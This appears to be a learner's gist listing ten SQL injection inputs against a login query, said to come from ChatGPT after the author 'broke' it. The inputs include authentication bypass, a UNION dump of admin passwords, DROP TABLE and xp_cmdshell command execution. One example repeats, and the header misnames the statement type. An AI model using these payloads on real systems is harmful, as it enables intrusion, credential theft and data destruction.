shriyanss/sql-select.md

This is for SQL INSERT statement. For INSERT statements, please see https://gist.github.com/shriyanss/1139f8c2b01e074642b7df745f9abc55

I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:-

I understand your request for examples of inputs that can lead to SQL injection vulnerabilities. Below are ten examples along with the potential malicious inputs and the resulting SQL queries. Please note that these examples are for educational purposes, and it's crucial to apply proper input validation and use parameterized queries or prepared statements to prevent SQL injection.

Malicious Input:

' OR '1'='1'; --

Resultant Query:

SELECT * FROM Users WHERE Username = '' OR '1'='1'; --' AND Password = '';

Malicious Input:

' UNION SELECT null, 'Malicious Data', null; --

Resultant Query:

SELECT * FROM Users WHERE Username = '' UNION SELECT null, 'Malicious Data', null; --' AND Password = '';

Malicious Input:

'; DROP TABLE Users; --

Resultant Query:

SELECT * FROM Users WHERE Username = ''; DROP TABLE Users; --' AND Password = '';

Malicious Input:

' OR IF(1=1, SLEEP(5), 0); --

Resultant Query:

SELECT * FROM Users WHERE Username = '' OR IF(1=1, SLEEP(5), 0); --' AND Password = '';

Malicious Input:

' OR '1'='1' AND 'a'='a'; --

Resultant Query:

SELECT * FROM Users WHERE Username = '' OR '1'='1' AND 'a'='a'; --' AND Password = '';

Malicious Input:

'; EXEC xp_cmdshell('nslookup example.com'); --

Resultant Query:

SELECT * FROM Users WHERE Username = ''; EXEC xp_cmdshell('nslookup example.com'); --' AND Password = '';

Malicious Input:

' UNION SELECT username, password FROM admin_users; --

Resultant Query:

SELECT * FROM Users WHERE Username = '' UNION SELECT username, password FROM admin_users; --' AND Password = '';

Malicious Input:

' OR 1=1; --

Resultant Query:

SELECT * FROM Users WHERE Username = '' OR 1=1; --' AND Password = '';

Malicious Input:

' OR 1=1; --

Resultant Query:

SELECT * FROM Users WHERE Username = '' OR 1=1; --' AND Password = '';

Malicious Input:

'; IF(1=1, SLEEP(5), 0); --

Resultant Query:

SELECT * FROM Users WHERE Username = ''; IF(1=1, SLEEP(5), 0); --' AND Password = '';

Preventing SQL injection involves using parameterized queries or prepared statements and validating/sanitizing user inputs. Always follow security best practices to protect your application from potential vulnerabilities.